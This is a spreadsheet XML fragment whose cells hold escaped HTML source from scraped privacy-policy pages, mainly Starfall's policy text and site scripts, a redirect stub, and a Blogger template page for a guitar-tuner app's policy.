                &lt;p&gt; Starfall may disclose information we have retained if we believe it necessary to comply with a legal process, law enforcement investigation, or government request. We may also divulge collected information in response to fraud or technical security issues or in matters of public safety.</t>
  </si>
  <si>
    <t>Any such disclosure or response will be tailored to comply with applicable law.&lt;/p&gt;
                &lt;h2&gt;International Visitors and Use Outside the U.S.&lt;/h2&gt;
                &lt;p&gt; Our services are operated and managed on servers located within the United States. If you are using our services outside the United States, you consent to having your information and data transferred to the United States for the purpose of performing the services according to our Terms of Service.</t>
  </si>
  <si>
    <t>If you are in any jurisdiction with laws or regulations governing internet use, including collection, use, and disclosure of personal data, different from those of the United States, you may only use our services in a manner that is lawful in your jurisdiction. Please do not use our services if use of our services is unlawful in your jurisdiction.
                 &lt;/p&gt;
                &lt;p&gt;</t>
  </si>
  <si>
    <t>This paragraph outlines our compliance with the General Data and Protection Regulation (GDPR) of the European Union and other applicable data protection laws. Starfall is the company that controls your data and is sometimes called the ‘data controller’ within the terms of the GDPR. We maintain records of all requests and our responses with respect to issues addressed in this Privacy Policy.</t>
  </si>
  <si>
    <t>Under the GDPR, we must maintain a data inventory and data flow mapping for compliance purposes. You have various rights under data protection laws and you have the right, without charge, upon verification of identity, to:
                &lt;/p&gt;
                &lt;ol&gt;
                    &lt;li&gt;Request a copy of the personal information about you that we have;&lt;/li&gt;
                    &lt;li&gt;Correct any inaccuracies in personal data about you that we have;&lt;/li&gt;
                    &lt;li&gt;Withdraw your consent where we have requested your consent to process information;&lt;/li&gt;
                    &lt;li&gt;Delete personal information within legally prescribed limitations; and&lt;/li&gt;
                    &lt;li&gt;Lodge a complaint with the appropriate public authority if you have any
                        concerns about how we process or retain your data.&lt;/li&gt;
                &lt;/ol&gt;
                &lt;p&gt;If you have any questions or requests concerning these rights, please contact us at &lt;a  href="mailto:helpdesk@starfall.com" target="_blank"&gt;helpdesk@starfall.com&lt;/a&gt; and your inquiry will be responded to as soon as possible but within 30 days of our receipt of your request.&lt;/p&gt;
                &lt;p&gt;
                    We have appointed an internal Data Protection Officer for you to contact if you have any questions regarding our privacy policy or if you wish to exercise your data protection rights. Your first point of contact should be with our customer service team that can be contacted at &lt;a  href="mailto:helpdesk@starfall.com" target="_blank"&gt;helpdesk@starfall.com&lt;/a&gt;.</t>
  </si>
  <si>
    <t>The Data Protection Officer for residents of the European Union may be contacted at &lt;a  href="mailto:euprivacy@starfall.com" target="_blank"&gt;euprivacy@starfall.com&lt;/a&gt;.
                 &lt;/p&gt;
                &lt;h2&gt;COPPA and FERPA&lt;/h2&gt;
                &lt;p&gt; We do not ask children for personal information or track children's progress.</t>
  </si>
  <si>
    <t>Children do not provide personal information to use and access our services. The Starfall websites and apps directed toward children operate in accordance and are consistent with the Children's Online Privacy Protection Act (COPPA) and the Family Educational Rights and Privacy Act (FERPA).&lt;/p&gt;
                &lt;h2&gt;Security&lt;/h2&gt;
                &lt;p&gt;Our servers are located in a secured, locked, and monitored environment. Data access is controlled by several firewall layers.</t>
  </si>
  <si>
    <t>Since no system is absolutely fail proof, we cannot guarantee the absolute security of your information. However, we employ physical, technical and administrative security measures designed to safeguard user information that follow or exceed industry standards.&lt;/p&gt;
                &lt;h2&gt;Advertising and Social Media&lt;/h2&gt;
                &lt;p&gt;Starfall does not display any advertising to children on our websites or apps. We strongly believe that children should not be the targets of marketing efforts during their educational experience.</t>
  </si>
  <si>
    <t>Resources for grown-ups, specifically those found on the Starfall Parent-Teacher Center™ and the Starfall Store™, may contain links to social media services, but are kept separate from children's activities and safeguarded behind a parent gate.&lt;/p&gt;
                &lt;h2&gt; Updates&lt;/h2&gt;
                &lt;p&gt; We may make changes to this privacy policy from time to time and will notify you of changes by posting the revised privacy policy with an updated date of revision on our websites.</t>
  </si>
  <si>
    <t>Your continued use of our services following the effective date of such update constitutes your acceptance of the revised policy.&lt;/p&gt;
                &lt;h2&gt;Contact Information&lt;/h2&gt;
                &lt;p&gt;Please contact Starfall with any questions or comments.&lt;/p&gt;
                &lt;p&gt; By email: &lt;a  href="mailto: helpdesk@starfall.com"&gt;helpdesk@starfall.com&lt;/a&gt;&lt;/p&gt;
                &lt;p&gt;By mail: Starfall Education Foundation, PO Box 359, Boulder, CO 80306&lt;/p&gt;
            &lt;/div&gt;&lt;!-- col-xs-12 --&gt;
        &lt;/div&gt;&lt;!-- row --&gt;
    &lt;/div&gt;&lt;!-- main container --&gt;
    &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="footer" role="contentinfo" aria-label="footer"&gt;
    &lt;div class="footer-bg"&gt;
        &lt;div class="no-print justify-content-center"&gt;
            &lt;div class="col-sm-12"&gt;
                &lt;ul&gt;
                    &lt;li&gt;&lt;a href="/about"&gt;About Starfall&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;
                        &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fsecure.starfall.com%2Flv%2Fcontact&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Contact+Form"
                           target="_blank"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="https://teach.starfall.com/privacy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
                    &lt;li&gt;&lt;a href="https://teach.starfall.com/terms"&gt;Terms of Service&lt;/a&gt;&lt;/li&gt;
                    &lt;li style="border:0px;"&gt;&lt;a href="https://teach.starfall.com/accessibility"&gt;Accessibility&lt;/a&gt;&lt;/li&gt;
                &lt;/ul&gt;
                &lt;div class="footer-social"&gt;
                    &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.facebook.com%2Fstarfall.education&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Facebook"
                       target="_blank"&gt;
                        &lt;img src="/img/social-icon-facebook.png" alt="Facebook"&gt;
                    &lt;/a&gt;
                    &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.pinterest.com%2Fstarfallfun&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Pinterest"
                       target="_blank"&gt;
                        &lt;img src="/img/social-icon-pinterest.png" alt="Pinterest"&gt;
                    &lt;/a&gt;
                    &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Ftwitter.com%2FStarfalledu&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Twitter"
                       target="_blank"&gt;
                        &lt;img src="/img/social-icon-twitter.png" alt="Twitter"&gt;
                    &lt;/a&gt;
                    &lt;a href="https://secure.starfall.com/lv/gated?forwardURL=https%3A%2F%2Fwww.youtube.com%2Fchannel%2FUCIXeBGVev0u4p5_BXxTxSKg&amp;returnURL=https%3A%2F%2Fteach.starfall.com%2Fprivacy&amp;label=Starfall+Youtube"
                       target="_blank"&gt;
                        &lt;img src="/img/social-icon-youtube.png" alt="Youtube"&gt;
                    &lt;/a&gt;
                &lt;/div&gt;&lt;!--footer-social--&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="footer-credits" style=""&gt;
        The Starfall Parent-Teacher Center™ is a program service of Starfall Education Foundation, a publicly
supported nonprofit organization, 501(c)(3). Starfall® and Starfall.com® are registered trademarks in
the U.S., the European Union, and various other countries. Copyright © 2002–2023 by Starfall Education.
</t>
  </si>
  <si>
    <t xml:space="preserve">All rights reserved.
 &lt;br&gt;&lt;br&gt;
We permit materials from the Starfall Parent-Teacher Center™ to be reproduced by teachers or parents for
noncommercial use in their classroom or home. Any other reproduction is prohibited without written
permission from the publisher.
</t>
  </si>
  <si>
    <t>&lt;div class="footer-copyright"&gt;
    &lt;p&gt;Parent-Teacher Center v4.1&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;/div&gt;    &lt;/div&gt;
&lt;/div&gt;
&lt;script&gt;
    function createCookie(name,value,days) {
        if (days) {
            var date = new Date();
            date.setTime(date.getTime()+(days*24*60*60*1000));
            var expires = "; expires="+date.toGMTString();
            var domain = ".starfall.com";
        }
        else var expires = "";
        document.cookie = name + "=" + value + expires + ";domain="+domain+";" + "path=/";
    }
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i &lt; ca.length;i++) {
            var c</t>
  </si>
  <si>
    <t>" placeholder="Search Starfall resources..." required autofocus&gt;
                    &lt;/div&gt;
                    &lt;div class="row text-center"&gt;
                        &lt;div class="col"&gt;
                            &lt;p class="mb-1"&gt;
                                &lt;strong&gt;I'm Looking for:&lt;/strong&gt;
                            &lt;/p&gt;
                            &lt;div class="form-check form-check-inline"&gt;
                                &lt;input class="form-check-input main-js-search-selection" type="checkbox" name="selectionGroup</t>
  </si>
  <si>
    <t>[]" id="inlineRadio1" value="download" checked&gt;
                                &lt;label class="form-check-label" for="inlineRadio1"&gt;Ready-Made Worksheets&lt;/label&gt;
                            &lt;/div&gt;
                            &lt;div class="form-check form-check-inline"&gt;
                                &lt;input class="form-check-input main-js-search-selection" type="checkbox" name="selectionGroup []" id="inlineRadio2" value="generator" checked&gt;
                                &lt;label class="form-check-label" for="inlineRadio2"&gt;Customizable Worksheets&lt;/label&gt;
                            &lt;/div&gt;
                            &lt;div class="form-check form-check-inline"&gt;
                                &lt;input class="form-check-input main-js-search-selection" type="checkbox" name="selectionGroup[]" id="inlineRadio3" value="activity" checked&gt;
                                &lt;label class="form-check-label" for="inlineRadio3"&gt;Starfall</t>
  </si>
  <si>
    <t>Activities&lt;/label&gt;
                            &lt;/div&gt;
                        &lt;/div&gt;
                    &lt;/div&gt;
                    &lt;div class="text-center mt-3"&gt;
                        &lt;button type="button" class="btn btn-primary main-js-submit" data-bs-dismiss="modal"&gt;Search!&lt;/button&gt;
                    &lt;/div&gt;
                &lt;/form&gt;
             &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;script&gt;
    $(document).ready(function(){
        $('.main-js-submit').on("click", function(e){
            e.preventDefault();
            let selection = $(".main-js-search-selection:checked").map(function(){
                return '&amp;selection[]=' + $(this).val();
            }).get();
            let selectionString = '';
            if(selection.length &gt; 0){
                selection.forEach(function(item){
                    selectionString = selectionString + item;
                })
                 window.location.href = "/search?query="</t>
  </si>
  <si>
    <t xml:space="preserve">+ $('.main-js-query').val() + selectionString;
            }else{
                window.location.href = "/search?query=" + $('.main-js-query').val();
            }
        })
        $('#main-search-form').keypress(function(e){
            if(e.which == 13){
                e.preventDefault();
                $('.main-js-submit').click();
            }
        });
        $('.modal').on('shown.bs.modal', function() {
            $(this).find('[autofocus]').focus();
        });
    });
&lt;/script&gt;&lt;script src="/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;
&lt;script src="/js/jquery-3.6.1.min.js"&gt;&lt;/script&gt;
&lt;/body&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Stop Motion Studio&lt;/title&gt;
&lt;meta http-equiv=”refresh” content=”0;url=https://www.cateater.com/privacy.html”&gt;
        &lt;script type="text/javascript"&gt;
             window.location.href = "https://www.cateater.com/privacy.html"
        &lt;/script&gt;
&lt;/head&gt;
 &lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html class='v2' dir='ltr' lang='en'&gt;
&lt;head&gt;
&lt;link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/&gt;
&lt;meta content='width=1100' name='viewport'/&gt;
&lt;meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/&gt;
&lt;meta content='blogger' name='generator'/&gt;
&lt;link href='http://www.a4tune.com/favicon.ico' rel='icon' type='image/x-icon'/&gt;
&lt;link href='http://www.a4tune.com/p/strobe-tuner-pro-privacy-policy.html' rel='canonical'/&gt;
&lt;link rel="alternate" type="application/atom+xml" title="A4tune Guitar and Violin Tuner - Atom" href="http://www.a4tune.com/feeds/posts/default" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="A4tune Guitar and Violin Tuner - RSS" href="http://www.a4tune.com/feeds/posts/default?alt=rss" /&gt;
&lt;link rel="service.post" type="application/atom+xml" title="A4tune Guitar and Violin Tuner - Atom" href="https://www.blogger.com/feeds/4989376373380229129/posts/default" /&gt;
&lt;!--Can't find substitution for tag [blog.ieCssRetrofitLinks]--&gt;
&lt;meta content='http://www.a4tune.com/p/strobe-tuner-pro-privacy-policy.html' property='og:url'/&gt;
&lt;meta content='Strobe Tuner Pro privacy policy' property='og:title'/&gt;
&lt;meta content='Privacy Policy - Strobe Tuner Pro  Effective date: 2021-11-17   Jan Holešovský (identification number of organization: 02085887, Czech Repub...' property='og:description'/&gt;
&lt;title&gt;A4tune Guitar and Violin Tuner: Strobe Tuner Pro privacy policy&lt;/title&gt;
&lt;style id='page-skin-1' type='text/css'&gt;&lt;!--
/*
-----------------------------------------------
Blogger Template Style
Name:     Travel
Designer: Sookhee Lee
URL:      www.plyfly.net
-----------------------------------------------</t>
  </si>
  <si>
    <t>*/
/* Content
----------------------------------------------- */
body {
font: normal normal 13px 'Trebuchet MS',Trebuchet,sans-serif;
color: #bbbbbb;
background: #000000 url(http://4.bp.blogspot.com/-nyDPgYC67UE/WtT-yk7zUpI/AAAAAAAAAHk/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw/s0/pexels-photo-165974.smaller.jpg) no-repeat fixed top center;
}
html body .region-inner {
min-width: 0;
max-width: 100%;
width: auto;
}
a:link {
text-decoration:none;
color: #ff9b00;
}
a:visited {
text-decoration:none;
color: #b87309;
}
a:hover {
text-decoration:underline;
color: #ff9b00;
}
.content-outer .content-cap-top {
height: 0;
background: transparent none repeat-x scroll top center;
}
.content-outer {
margin: 0 auto;
padding-top: 20px;
}
.content-inner {
background: transparent url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_70.png) repeat scroll top left;
background-position: left -0;
background-color: rgba(0, 0, 0, 0);
padding: 20px;
}
.main-inner .date-outer {
margin-bottom: 2em;
}
/* Header
----------------------------------------------- */
.header-inner .Header .titlewrapper,
.header-inner .Header .descriptionwrapper</t>
  </si>
  <si>
    <t>{
padding-left: 10px;
padding-right: 10px;
}
.Header h1 {
font: normal normal 60px 'Trebuchet MS',Trebuchet,sans-serif;
color: #ffffff;
}
.Header h1 a {
color: #ffffff;
}
.Header .description</t>
  </si>
  <si>
    <t>{
color: #bbbbbb;
font-size: 130%;
}
/* Tabs
----------------------------------------------- */
.tabs-inner {
margin: 1em 0 0;
padding: 0;
}
.tabs-inner .section {
margin: 0;
}
.tabs-inner .widget ul {
padding: 0;
background: rgba(0, 0, 0, 0) url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top center;
}
.tabs-inner .widget li {
border: none;
}
.tabs-inner .widget li a {
display: inline-block;
padding: 1em 1.5em;
color: #ffffff;
font: normal bold 16px 'Trebuchet MS',Trebuchet,sans-serif;
}
.tabs-inner .widget li.selected a,
.tabs-inner .widget li a:hover {
position: relative;
z-index: 1;
background: rgba(0, 0, 0, 0) url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top center;
color: #ffffff;
}
/* Headings
----------------------------------------------- */
h2 {
font: normal bold 14px 'Trebuchet MS',Trebuchet,sans-serif;
color: #ffffff;
}
.main-inner h2.date-header {
font: normal normal 14px 'Trebuchet MS',Trebuchet,sans-serif;
color: #bbbbbb;
}
.footer-inner .widget h2,
.sidebar .widget</t>
  </si>
  <si>
    <t>h2 {
padding-bottom: .5em;
}
/* Main
----------------------------------------------- */
.main-inner {
padding: 20px 0;
}
.main-inner .column-center-inner {
padding: 10px 0;
}
.main-inner .column-center-inner .section {
margin: 0 10px;
}
.main-inner .column-right-inner {
margin-left: 20px;
}
.main-inner .fauxcolumn-right-outer .fauxcolumn-inner {
margin-left: 20px;
background: rgba(0, 0, 0, 0) url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top left;
}
.main-inner .column-left-inner {
margin-right: 20px;
}
.main-inner .fauxcolumn-left-outer .fauxcolumn-inner {
margin-right: 20px;
background: rgba(0, 0, 0, 0) url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top left;
}
.main-inner .column-left-inner,
.main-inner .column-right-inner {
padding: 15px 0;
}
/* Posts
----------------------------------------------- */
h3.post-title {
margin-top: 20px;
}
h3.post-title a {
font: normal bold 20px 'Trebuchet MS',Trebuchet,sans-serif;
color: #ffffff;
}
h3.post-title a:hover {
text-decoration: underline;
}
.main-inner .column-center-outer {
background: rgba(0, 0, 0, 0) none repeat scroll top left;
_background-image: none;
}
.post-body {
line-height: 1.4;
position: relative;
}
.post-header {
margin: 0 0 1em;
line-height: 1.6;
}
.post-footer {
margin: .5em 0;
line-height: 1.6;
}
#blog-pager {
font-size: 140%;
}
#comments {
background: transparent url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top center;
padding: 15px;
}
#comments .comment-author {
padding-top: 1.5em;
}
#comments h4,
#comments .comment-author a,
#comments .comment-timestamp a {
color: #ffffff;
}
#comments .comment-author:first-child {
padding-top: 0;
border-top: none;
}
.avatar-image-container {
margin: .2em 0 0;
}
/* Comments
-----------------------------------------------</t>
  </si>
  <si>
    <t>*/
#comments a {
color: #ffffff;
}
.comments .comments-content .icon.blog-author {
background-repeat: no-repeat;
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABIAAAASCAYAAABWzo5XAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEgAACxIB0t1+/AAAAAd0SU1FB9sLFwMeCjjhcOMAAAD+SURBVDjLtZSvTgNBEIe/WRRnm3U8RC1neQdsm1zSBIU9VVF1FkUguQQsD9ITmD7ECZIJSE4OZo9stoVjC/zc7ky+zH9hXwVwDpTAWWLrgS3QAe8AZgaAJI5zYAmc8r0G4AHYHQKVwII8PZrZFsBFkeRCABYiMh9BRUhnSkPTNCtVXYXURi1FpBDgArj8QU1eVXUzfnjv7yP7kwu1mYrkWlU33vs1QNu2qU8pwN0UpKoqokjWwCztrMuBhEhmh8bD5UDqur75asbcX0BGUB9/HAMB+r32hznJgXy2v0sGLBcyAJ1EK3LFcbo1s91JeLwAbwGYu7TP/3ZGfnXYPgAVNngtqatUNgAAAABJRU5ErkJggg==);
}
.comments .comments-content .loadmore a {
border-top: 1px solid #ffffff;
border-bottom: 1px solid #ffffff;
}
.comments .comment-thread.inline-thread {
background: rgba(0, 0, 0, 0);
}
.comments .continue {
border-top: 2px solid #ffffff;
}
/* Widgets
----------------------------------------------- */
.sidebar .widget {
border-bottom: 2px solid rgba(0, 0, 0, 0);
padding-bottom: 10px;
margin: 10px 0;
}
.sidebar .widget: first-child {
margin-top: 0;
}
.sidebar .widget:last-child {
border-bottom: none;
margin-bottom: 0;
padding-bottom: 0;
}
.footer-inner .widget,
.sidebar</t>
  </si>
  <si>
    <t>.widget {
font: normal normal 13px 'Trebuchet MS',Trebuchet,sans-serif;
color: #bbbbbb;
}
.sidebar .widget a:link {
color: #bbbbbb;
text-decoration: none;
}
.sidebar .widget a:visited {
color: #b87209;
}
.sidebar .widget a:hover {
color: #bbbbbb;
text-decoration: underline;
}
.footer-inner .widget a:link {
color: #ff9b00;
text-decoration: none;
}
.footer-inner .widget a:visited {
color: #b87309;
}
.footer-inner .widget a:hover {
color: #ff9b00;
text-decoration: underline;
}
.widget .zippy {
color: #ffffff;
}
.footer-inner {
background: transparent none repeat scroll top center;
}
/*</t>
  </si>
  <si>
    <t>Mobile
----------------------------------------------- */
body.mobile  {
background-size: 100% auto;
}
body.mobile .AdSense {
margin: 0 -10px;
}
.mobile .body-fauxcolumn-outer {
background: transparent none repeat scroll top left;
}
.mobile .footer-inner .widget a:link {
color: #bbbbbb;
text-decoration: none;
}
.mobile .footer-inner .widget</t>
  </si>
  <si>
    <t xml:space="preserve">a:visited {
color: #b87209;
}
.mobile-post-outer a {
color: #ffffff;
}
.mobile-link-button {
background-color: #ff9b00;
}
.mobile-link-button a:link, .mobile-link-button a:visited {
color: #ffffff;
}
.mobile-index-contents {
color: #bbbbbb;
}
.mobile .tabs-inner .PageList .widget-content {
background: rgba(0, 0, 0, 0) url(https://resources.blogblog.com/blogblog/data/1kt/travel/bg_black_50.png) repeat scroll top center;
color: #ffffff;
}
.mobile .tabs-inner .PageList .widget-content .pagelist-arrow {
border-left: 1px solid #ffffff;
}
--&gt;&lt;/style&gt;
&lt;style id='template-skin-1' type='text/css'&gt;&lt;!--
body {
min-width: 960px;
}
.content-outer, .content-fauxcolumn-outer, .region-inner {
min-width: 960px;
max-width: 960px;
_width: 960px;
}
.main-inner .columns {
padding-left: 0;
padding-right: 310px;
}
.main-inner .fauxcolumn-center-outer {
left: 0;
</t>
  </si>
  <si>
    <t>right: 310px;
/* IE6 does not respect left and right together */
_width: expression(this.parentNode.offsetWidth -
parseInt("0") -
parseInt("310px") + 'px');
}
.main-inner .fauxcolumn-left-outer {
width: 0;
}
.main-inner .fauxcolumn-right-outer {
width: 310px;
}
.main-inner .column-left-outer {
width: 0;
right: 100%;
margin-left: -0;
}
.main-inner .column-right-outer {
width: 310px;
margin-right: -310px;
}
#layout {
min-width: 0;
}
#layout .content-outer {
min-width: 0;
width: 800px;
}
#layout .region-inner {
min-width: 0;
width: auto;
}
body#layout div.add_widget {
padding: 8px;
}
body#layout div.add_widget a {
margin-left: 32px;
}
--&gt;&lt;/style&gt;
 &lt;style&gt;
    body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/s0\/pexels-photo-165974.smaller.jpg);}
@media (max-width: 200px) { body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/w200\/pexels-photo-165974.smaller.jpg);}}
@media (max-width: 400px) and (min-width: 201px) { body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/w400\/pexels-photo-165974.smaller.jpg);}}
@media (max-width: 800px) and (min-width: 401px) { body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/w800\/pexels-photo-165974.smaller.jpg);}}
@media (max-width: 1200px) and (min-width: 801px) { body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/w1200\/pexels-photo-165974.smaller.jpg);}}
/* Last tag covers anything over one higher than the previous max-size cap.</t>
  </si>
  <si>
    <t>*/
@media (min-width: 1201px) { body {background-image:url(http\:\/\/4.bp.blogspot.com\/-nyDPgYC67UE\/WtT-yk7zUpI\/AAAAAAAAAHk\/7OpJilb4VVkW5lyHfoI-WEK4UJUmZurUwCK4BGAYYCw\/w1600\/pexels-photo-165974.smaller.jpg);}}
  &lt;/style&gt;
&lt;script type='text/javascript'&gt;
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-85277140-1', 'auto', 'blogger');
        ga('blogger.send', 'pageview');
      &lt;/script&gt;
&lt;link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4989376373380229129&amp;amp;zx=9ad444a9-95ed-450a-9357-b68522066fa9' media='none' onload='if(media!=&amp;#39;all&amp;#39;)media=&amp;#39;all&amp;#39;' rel='stylesheet'/&gt;&lt;noscript&gt;&lt;link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=4989376373380229129&amp;amp;zx=9ad444a9-95ed-450a-9357-b68522066fa9' rel='stylesheet'/&gt;&lt;/noscript&gt;
&lt;meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/&gt;
&lt;meta name='google-adsense-platform-domain' content='blogspot.com'/&gt;
&lt;/head&gt;
&lt;body class='loading variant-studio'&gt;
&lt;div class='navbar no-items section' id='navbar' name='Navbar'&gt;
&lt;/div&gt;
&lt;div class='body-fauxcolumns'&gt;
&lt;div class='fauxcolumn-outer body-fauxcolumn-outer'&gt;
&lt;div class='cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left'&gt;
&lt;div class='fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='fauxcolumn-inner'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='content'&gt;
&lt;div class='content-fauxcolumns'&gt;
&lt;div class='fauxcolumn-outer content-fauxcolumn-outer'&gt;
&lt;div class='cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left'&gt;
&lt;div class='fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='fauxcolumn-inner'&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='content-outer'&gt;
&lt;div class='content-cap-top cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left content-fauxborder-left'&gt;
&lt;div class='fauxborder-right content-fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='content-inner'&gt;
&lt;header&gt;
&lt;div class='header-outer'&gt;
&lt;div class='header-cap-top cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left header-fauxborder-left'&gt;
&lt;div class='fauxborder-right header-fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='region-inner header-inner'&gt;
&lt;div class='header section' id='header' name='Header'&gt;&lt;div class='widget Header' data-version='1' id='Header1'&gt;
&lt;div id='header-inner'&gt;
&lt;div class='titlewrapper'&gt;
&lt;h1 class='title'&gt;
&lt;a href='http://www.a4tune.com/'&gt;
A4tune Guitar and Violin Tuner
&lt;/a&gt;
&lt;/h1&gt;
&lt;/div&gt;
&lt;div class='descriptionwrapper'&gt;
&lt;p class='description'&gt;&lt;span&gt;
&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='header-cap-bottom cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/header&gt;
&lt;div class='tabs-outer'&gt;
&lt;div class='tabs-cap-top cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left tabs-fauxborder-left'&gt;
&lt;div class='fauxborder-right tabs-fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='region-inner tabs-inner'&gt;
&lt;div class='tabs section' id='crosscol' name='Cross-Column'&gt;&lt;div class='widget Text' data-version='1' id='Text1'&gt;
&lt;div class='widget-content'&gt;
&lt;h3 class="post-title entry-title" itemprop="name"&gt; &lt;a href="https://play.google.com/store/apps/details?id=com.a4tune"&gt;Download the A4tune Guitar and Violin Tuner from Google Play&lt;/a&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div class='clear'&gt;&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class='tabs no-items section' id='crosscol-overflow' name='Cross-Column 2'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='tabs-cap-bottom cap-bottom'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class='main-outer'&gt;
&lt;div class='main-cap-top cap-top'&gt;
&lt;div class='cap-left'&gt;&lt;/div&gt;
&lt;div class='cap-right'&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class='fauxborder-left main-fauxborder-left'&gt;
&lt;div class='fauxborder-right main-fauxborder-right'&gt;&lt;/div&gt;
&lt;div class='region-inner main-inner'&gt;
&lt;div class='columns fauxcolumns'&gt;
